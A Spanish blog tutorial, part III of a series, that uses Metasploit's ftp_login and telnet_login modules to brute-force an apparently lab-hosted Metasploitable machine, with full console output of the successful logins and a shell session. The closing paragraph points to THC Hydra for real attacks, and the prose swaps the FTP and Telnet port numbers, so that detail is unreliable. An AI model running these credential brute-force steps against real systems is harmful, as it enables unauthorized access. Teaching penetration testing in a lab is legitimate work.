Inicio > Hacking, MetaSploit > Penetrando Sistemas bajo plataforma GNU/Linux (vulnerable) con MetaSploit FrameWork – Parte III

Penetrando Sistemas bajo plataforma GNU/Linux (vulnerable) con MetaSploit FrameWork – Parte III

CONCEPTOS BASICOS DE PENETRACION BAJO PLATAFORMA GNU/LINUX(VULNERABLE) USANDO METASPLOIT FRAMEWORK – PARTE III
Atacando FTP y Telnet Vulnerables

Encontrando Vulnerabilidades sobre el servicio FTP (Puerto 21) y Telnet (Puerto 23)

De acuerdo al escaneo realizado anteriormente, se ha identificado que el servicio FTP se encuentra abierto por el puerto 23 y el servicio Telnet por el puerto 21, como en el caso de MySQL y PostgreSQL se puede utilizar el modulo ftp_login y telnet_login respectivamente.

ftp_login

msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) > show options
Module options (auxiliary/scanner/ftp/ftp_version):

Name Current Setting Required Description

—- ————— ——– ———–

FTPPASS mozilla@example.com no The password for the specified username

FTPUSER anonymous no The username to authenticate as

RHOSTS yes The target address range or CIDR identifier

RPORT 21 yes The target port

THREADS 1 yes The number of concurrent threads

msf auxiliary(ftp_version) > use auxiliary/scanner/ftp/ftp_login

msf auxiliary(ftp_login) > show options

Module options (auxiliary/scanner/ftp/ftp_login):

Name Current Setting Required Description

—- ————— ——– ———–

BLANK_PASSWORDS true no Try blank passwords for all users

BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5

PASSWORD no A specific password to authenticate with

PASS_FILE no File containing passwords, one per line

RHOSTS yes The target address range or CIDR identifier

RPORT 21 yes The target port

STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host

THREADS 1 yes The number of concurrent threads

USERNAME no A specific username to authenticate as

USERPASS_FILE no File containing users and passwords separated by space, one pair per line

USER_AS_PASS true no Try the username as the password for all users

USER_FILE no File containing usernames, one per line

VERBOSE true yes Whether to print output for all attempts

msf auxiliary(ftp_login) > set PASS_FILE /home/adastra/UTILITIES/userPass.lst

PASS_FILE => /home/adastra/UTILITIES/userPass.lst

msf auxiliary(ftp_login) > set USER_FILE /home/adastra/UTILITIES/userlist.lst

USER_FILE => /home/adastra/UTILITIES/userlist.lst

msf auxiliary(ftp_login) > set STOP_ON_SUCCESS true

STOP_ON_SUCCESS => true

msf auxiliary(ftp_login) > set RHOSTS 192.168.1.34

RHOSTS => 192.168.1.34

msf auxiliary(ftp_login) > run

*] 192.168.1.34:21 – Starting FTP login sweep

[*] Connecting to FTP server 192.168.1.34:21…

[*] Connected to target FTP server.

[*] 192.168.1.34:21 – FTP Banner: ‘220 ProFTPD 1.3.1 Server (Debian) [::ffff:192.168.1.34]\x0d\x0a’

[*] 192.168.1.34:21 – Attempting FTP login for ‘admin’:”

[*] 192.168.1.34:21 – Failed FTP login for ‘admin’:”

……………………..

[+] 192.168.1.34:21 – Successful FTP login for ‘msfadmin’:’msfadmin’

[*] 192.168.1.34:21 – User ‘msfadmin’ has READ/WRITE access

[*] 192.168.1.34:21 – Attempting FTP login for ‘admin’:’root’

[*] Connecting to FTP server 192.168.1.34:21…

[*] Connected to target FTP server.

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

telnet_login

msf > use auxiliary/scanner/telnet/telnet_login

msf auxiliary(telnet_login) > show options

Module options (auxiliary/scanner/telnet/telnet_login):

Name Current Setting Required Description

—- ————— ——– ———–

BLANK_PASSWORDS true no Try blank passwords for all users

BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5

PASSWORD no A specific password to authenticate with

PASS_FILE no File containing passwords, one per line

RHOSTS 192.168.1.34 yes The target address range or CIDR identifier

RPORT 23 yes The target port

STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host

THREADS 1 yes The number of concurrent threads

USERNAME no A specific username to authenticate as

USERPASS_FILE no File containing users and passwords separated by space, one pair per line

USER_AS_PASS true no Try the username as the password for all users

USER_FILE no File containing usernames, one per line

VERBOSE true yes Whether to print output for all attempts

msf auxiliary(telnet_login) > set PASS_FILE /home/adastra/UTILITIES/userPass.lst

PASS_FILE => /home/adastra/UTILITIES/userPass.lst

msf auxiliary(telnet_login) > set USERPASS_FILE /home/adastra/UTILITIES/userlist.lst

USERPASS_FILE => /home/adastra/UTILITIES/userlist.lst

msf auxiliary(telnet_login) > set STOP_ON_SUCCESS true

STOP_ON_SUCCESS => true

msf auxiliary(telnet_login) > run

[*] 192.168.1.34:23 Telnet – Attempting: ”:”

[*] 192.168.1.34:23 Banner: Ubuntu 8.04 metasploitable login:

[*] 192.168.1.34:23 Prompt: Password:

[*] 192.168.1.34:23 Result: Login incorrect

[*] 192.168.1.34:23 Telnet – Attempting: ‘admin’:”

[*] 192.168.1.34:23 Banner: Ubuntu 8.04 metasploitable login:

[*] 192.168.1.34:23 Prompt: Password:

[*] 192.168.1.34:23 Result: Login incorrect

………………..

[*] 192.168.1.34:23 Telnet – Attempting: ‘msfadmin’:’msfadmin’

[*] 192.168.1.34:23 Banner: Ubuntu 8.04 metasploitable login:

[*] 192.168.1.34:23 Prompt: Password:

[*] 192.168.1.34:23 Result:

Last login: Tue May 17 16:22:51 EDT 2011 from 192.168.1.33 on pts/1 Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. To access official Ubuntu documentation, please visit: http://help.ubuntu.com/ No mail. 1 failure since last login. Last was Tue 17 May 2011 05:42:07 PM EDT on pts/0.
msfadmin@metasploitable:~$

[+] 192.168.1.34 – SUCCESSFUL LOGIN msfadmin : msfadmin

[*] Command shell session 2 opened (192.168.1.33:57984 -> 192.168.1.34:23) at Tue May 17 23:42:18 +0200 2011

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

Como puede apreciarse, basta con implementar un ataque simple de fuerza bruta se ha conseguido romper en ambos servicios, lo que muy probablemente no aplicará en el mundo real con servidores y servicios correctamente configurados, sin embargo para efectos demostrativos es valido, probablemente en un ataque real, será mejor emplear las opciones avanzadas de THC Hydra para este tipo de ataques.

  1. Aún no hay comentarios.
  1. No trackbacks yet.

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: